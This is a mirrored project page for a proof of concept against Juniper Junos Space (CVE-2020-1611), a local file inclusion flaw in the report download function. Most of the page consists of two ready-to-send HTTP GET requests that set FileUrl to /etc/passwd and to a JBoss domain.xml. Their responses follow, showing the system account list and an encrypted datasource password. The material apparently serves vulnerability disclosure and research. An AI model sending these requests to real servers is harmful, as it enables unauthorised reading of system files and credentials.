GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → Ibonok → CVE-2020-1611

Ibonok / CVE-2020-1611

Licence: other
Juniper Junos Space (CVE-2020-1611) (PoC)

Labels

juniperpocdescriptionvulnerabilitycve-2020-1611

Projects that are alternatives of or similar to CVE-2020-1611

Poc
Proofs-of-concept
Stars: ✭ 467 (+1768%)
Mutual labels:  poc, vulnerability
Poccollect
Poc Collected for study and develop
Stars: ✭ 15 (-40%)
Mutual labels:  poc, vulnerability
Vulscan
vulscan 扫描系统:最新的poc&exp漏洞扫描,redis未授权、敏感文件、java反序列化、tomcat命令执行及各种未授权扫描等...
Stars: ✭ 486 (+1844%)
Mutual labels:  poc, vulnerability
Javadeserh2hc
Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).
Stars: ✭ 361 (+1344%)
Mutual labels:  poc, vulnerability
Php7 Opcache Override
Security-related PHP7 OPcache abuse tools and demo
Stars: ✭ 237 (+848%)
Mutual labels:  poc, vulnerability
Hacking
hacker, ready for more of our story ! 🚀
Stars: ✭ 413 (+1552%)
Mutual labels:  poc, vulnerability
Cve 2020 10199 cve 2020 10204
CVE-2020-10199、CVE-2020-10204漏洞一键检测工具,图形化界面。CVE-2020-10199 and CVE-2020-10204 Vul Tool with GUI.
Stars: ✭ 20 (-20%)
Mutual labels:  poc, vulnerability
Xray
一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc | 使用之前务必先阅读文档
Stars: ✭ 6,218 (+24772%)
Mutual labels:  poc, vulnerability
Exphub
Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-10204、CVE-2020-10199、CVE-2020-1938、CVE-2020-2551、CVE-2020-2555、CVE-2020-2883、CVE-2019-17558、CVE-2019-6340
Stars: ✭ 3,056 (+12124%)
Mutual labels:  poc, vulnerability
Pub
Vulnerability Notes, PoC Exploits and Write-Ups for security issues disclosed by tintinweb
Stars: ✭ 217 (+768%)
Mutual labels:  poc, vulnerability
NSE-scripts
NSE scripts to detect CVE-2020-1350 SIGRED and CVE-2020-0796 SMBGHOST, CVE-2021-21972, proxyshell, CVE-2021-34473
Stars: ✭ 105 (+320%)
Mutual labels:  poc, vulnerability
dheater
D(HE)ater is a proof of concept implementation of the D(HE)at attack (CVE-2002-20001) through which denial-of-service can be performed by enforcing the Diffie-Hellman key exchange.
Stars: ✭ 142 (+468%)
Mutual labels:  poc, vulnerability
Pentesting
Misc. Public Reports of Penetration Testing and Security Audits.
Stars: ✭ 24 (-4%)
Mutual labels:  poc, vulnerability
Ysoserial
A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Stars: ✭ 4,808 (+19132%)
Mutual labels:  poc, vulnerability
CVE-2021-33766
ProxyToken (CVE-2021-33766) : An Authentication Bypass in Microsoft Exchange Server POC exploit
Stars: ✭ 37 (+48%)
Mutual labels:  poc, vulnerability
Bitp0wn
Algorithms to re-compute a private key, to fake signatures and some other funny things with Bitcoin.
Stars: ✭ 59 (+136%)
Mutual labels:  poc, vulnerability
Ary
Ary 是一个集成类工具,主要用于调用各种安全工具,从而形成便捷的一键式渗透。
Stars: ✭ 241 (+864%)
Mutual labels:  poc, vulnerability
CVE-2020-11651
CVE-2020-11651: Proof of Concept
Stars: ✭ 41 (+64%)
Mutual labels:  poc, vulnerability
CVE-2020-8597
CVE-2020-8597 pppd buffer overflow poc
Stars: ✭ 48 (+92%)
Mutual labels:  poc
TIGER
Python toolbox to evaluate graph vulnerability and robustness (CIKM 2021)
Stars: ✭ 103 (+312%)
Mutual labels:  vulnerability
View All Similar Projects ➔

Juniper Junos Space prior to 19.4R1 Local File Inclusion Vulnerability (CVE-2020-1611) (PoC)

Juniper Junos Space prior to 19.4R1 is vulnerable to a local file inclusion vulnerability. An attacker with normal user rights could exploit this vulnerability.

The "Download Report" function is vulnerable.

Base Score: 6.5
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Links:

Example

GET Parameters:

  • Set "Format" to "txt"
  • Set "FileUrl" to a local path

Request: (/ect/passwd)

GET /mainui/download?X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7&type=downloadGROpenReport&_browserId=1553107455361&FileUrl=/etc/passwd&Format=txt&nodeHost=space-000311c3b873 HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.10/mainui/nLegacy.jsp?bid=1553107455361&appName=CMP
DNT: 1
Connection: close
Cookie: ext-$sidebar_gettingStarted_checkbox=o%3Achecked%3Db%253A0; DWRSESSIONID=sicWsVGWEjxdNYR7RJ60rCtbBrOmy0JHBm4h; JSESSIONID="aoVrgUa7V1prIWVO5KEmCqF6QGuuYZ44RshRxEYHAJXqQDCNBjV6pLKiaaXQx2jWjGWw5TxnDxkKts_.space-000311c3b873:server3"; JSESSIONIDSSO=Cm5qb87syONJ2lku1dadTx-SVyaoy0k9lt-bwSnTkfFrdONVfvmzrxB+g8xny4gjyKk_; X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7; JxRunningBids=_1553107455361_

Response:

HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 13:32:31 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Pragma: No-cache
Cache-Control: no-cache,no-store,must-revalidate,private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Content-Disposition: attachment; filename="passwd"
Content-Type: application/octet-stream
Content-Length: 1345
Connection: close

root:x:0:0:root:/root:/bin/bash
daemon:x:2:2:daemon:/sbin:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
mysql:x:499:499:MySQL server:/var/lib/mysql:/sbin/nologin
cassandra:x:498:498::/var/lib/cassandra:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
gluster:x:497:497:GlusterFS daemons:/var/run/gluster:/sbin/nologin
jboss:x:500:500::/usr/local/jboss:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:496:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
unbound:x:495:495:Unbound DNS resolver:/etc/unbound:/sbin/nologin
redis:x:494:494:Redis Server:/var/lib/redis:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
slipstream:x:493:493::/usr/local//slipstream/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74::/var/empty/sshd:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
tcpdump:x:72:72::/:/sbin/nologin
pcap:x:77:77:::/sbin/nologin
opennms:x:503:504::/home/opennms:/bin/bash
cassandr:x:504:505::/home/cassandr:/bin/bash

Request: (/usr/local/jboss/domain/configuration/domain.xml)

GET /mainui/download?X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7&type=downloadGROpenReport&_browserId=1553107455361&FileUrl=/usr/local/jboss/domain/configuration/domain.xml&Format=txt&nodeHost=space-000311c3b873 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://10.10.10.10/mainui/nLegacy.jsp?bid=1553107455361&appName=CMP
DNT: 1
Connection: close
Cookie: ext-$sidebar_gettingStarted_checkbox=o%3Achecked%3Db%253A0; DWRSESSIONID=sicWsVGWEjxdNYR7RJ60rCtbBrOmy0JHBm4h; JSESSIONID="aoVrgUa7V1prIWVO5KEmCqF6QGuuYZ44RshRxEYHAJXqQDCNBjV6pLKiaaXQx2jWjGWw5TxnDxkKts_.space-000311c3b873:server3"; JSESSIONIDSSO=Cm5qb87syONJ2lku1dadTx-SVyaoy0k9lt-bwSnTkfFrdONVfvmzrxB+g8xny4gjyKk_; X-CSRF=Y581SFvKU5INQPItBUoNj4NKf4IuqjSyywfRylPN3GLYaML3fM074gV2AIPBQjHEJsuJ9d7; JxRunningBids=_1553107455361_

Response:

HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 13:33:51 GMT
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
Pragma: No-cache
Cache-Control: no-cache,no-store,must-revalidate,private
Expires: Thu, 01 Jan 1970 00:00:00 UTC
Content-Disposition: attachment; filename="domain.xml"
Content-Type: application/octet-stream
Content-Length: 82266
Connection: close

<?xml version='1.0' encoding='UTF-8'?>

<domain xmlns="urn:jboss:domain:1.8">

    <extensions>
        <extension module="org.jboss.as.clustering.infinispan"/>
        <extension module="org.jboss.as.clustering.jgroups"/>
        <extension module="org.jboss.as.cmp"/>
        <extension module="org.jboss.as.configadmin"/>
        <extension module="org.jboss.as.connector"/>
        <extension module="org.jboss.as.ee"/>

        ... sniped ...

            <security-domain name="JbmDSEncryptedPassword" cache-type="default">
                        <authentication>
                            <login-module code="org.picketbox.datasource.security.SecureIdentityLoginModule" flag="required">
                                <module-option name="username" value="jboss"/>
                                <module-option name="password" value="-31ce1c5522d21131315552d323d4fcaf33412da8553aad12cfff123d443c5d123444cfd312c132d4"/>
                            </login-module>
                        </authentication>
                    </security-domain>

        ... sniped ...

</domain>
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].